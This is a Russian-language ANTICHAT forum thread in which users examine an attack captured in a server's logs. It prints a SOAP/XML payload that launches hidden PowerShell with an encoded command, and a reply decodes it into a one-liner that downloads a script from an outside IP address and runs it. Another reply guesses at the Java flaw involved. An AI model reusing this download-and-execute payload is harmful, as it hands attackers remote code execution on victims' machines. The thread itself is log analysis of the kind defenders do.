HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
Перезагрузить страницу наблюдал интересную атаку...
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 04.06.2018, 13:43
Ondrik8
Новичок
Регистрация: 08.11.2016
Сообщений: 0
С нами: 5005666

Репутация: 0
По умолчанию
Код:


Код:
soapenv:Envelope xmlns:soapenv = "http://schemas.xmlsoap.org/soap/envelope/">
\n
\n
\n
\n
\n  
\n    
\n      cmd.exe
\n    
\n    
\n      /c
\n    
\n    
\n      Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==
\n    
\n  
\n    
\n
\n
\n
\n
\n
\n
\n
вот что попало в логи, одного из серверов, атака шла от китайского IP адреса ) понятно что задействован powershell и js или java

возможно я спалил методику атаки... давайте разберемся!

кто что скажет?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 04.06.2018, 19:42
fuzscore
Новичок
Регистрация: 22.11.2016
Сообщений: 0
С нами: 4984999

Репутация: 0
По умолчанию
Декод строки
$OS=(GWmi Win32_OperatingSystem).Caption;$WC=New-Object Net.WebClient;$WC.Headers['User-Agent']="PowerShell/WL+ $OS";IEX $WC.DownloadString('http://111.230.229.226/images/test/DL.php');
 
Ответить с цитированием

  #3  
Старый 04.06.2018, 19:52
Dr.Lafa
Новичок
Регистрация: 30.12.2016
Сообщений: 0
С нами: 4931546

Репутация: 0
По умолчанию
Скорее всего бот гуляет по интернету и пытается проэксплуатировать дырку в каком-то java-приложении, которое обрабатывает xml.
Подобный эксплоит есть для Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass. CVE_2017_12617
Но тут какая-то другая уязвимость
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.